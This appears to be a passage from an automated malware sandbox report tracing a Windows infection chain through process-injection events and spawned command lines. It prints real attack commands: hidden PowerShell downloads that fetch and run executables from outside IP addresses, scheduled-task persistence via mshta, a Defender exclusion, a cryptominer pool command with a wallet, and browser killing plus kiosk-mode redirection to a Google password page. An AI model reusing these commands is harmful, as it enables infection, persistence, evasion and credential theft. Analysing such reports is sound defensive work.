N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5068 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
PID 5068 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
PID 2184 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
PID 2184 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
PID 5068 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 5068 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 5068 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 5068 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1724 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1724 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 5068 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 5068 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 644 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 644 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 644 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 5068 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 5068 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 3580 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 3580 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 3580 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 5068 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
PID 5068 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
PID 5068 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
PID 2256 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\mshta.exe
PID 2256 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\mshta.exe
PID 2256 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\mshta.exe
PID 4456 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4456 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4456 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2264 wrote to memory of 1588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 1588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 1588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 5068 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 5068 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2856 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2856 wrote to memory of 2620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2056 wrote to memory of 3924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2056 wrote to memory of 3924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe

"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE

"C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C252.tmp\C253.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE

"C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgq0aj3o\zgq0aj3o.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES119A.tmp" "c:\Users\Admin\AppData\Local\Temp\zgq0aj3o\CSCF0F5354ECBDC4CB8ABF25013C7A2A43.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "TYIbymaKsFJ" /tr "mshta \"C:\Temp\Y3xqvQ15g.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\Y3xqvQ15g.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\gmwu\wtrpqgw.exe

C:\ProgramData\gmwu\wtrpqgw.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe

"C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xLUFfgfR\Anubis.exe""

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe

"C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"

C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe

"C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3836 -ip 3836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 812

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe

"C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4384"

C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe

"C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe

"C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4384"

C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe

"C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe"

C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe

"C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe"

C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe

"C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27490 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4da8b1-1917-48f8-8471-c9d4026ec0ea} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 28410 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a83a43-be66-4ac1-b59d-ee0f9412b728} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3196 -childID 1 -isForBrowser -prefsHandle 3188 -prefMapHandle 3184 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5316dc-602e-4628-b280-8aaf8196ae20} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 32900 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0c3d3f6-51aa-4537-b6ae-6c478898c3e0} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab

C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe

"C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4880 -prefMapHandle 4764 -prefsLen 32932 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18f7a36f-15c3-43fd-9335-6c8ad02b5c0b} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5048 -childID 3 -isForBrowser -prefsHandle 4944 -prefMapHandle 4956 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dab1ff2-857a-452f-8cf6-47ea9cfc5996} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5256 -childID 4 -isForBrowser -prefsHandle 5268 -prefMapHandle 5272 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8faeb7e1-521b-46fe-baeb-4c27939b5db0} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" tab

C:\Program Files\Mozilla Firefox\firefox.exe

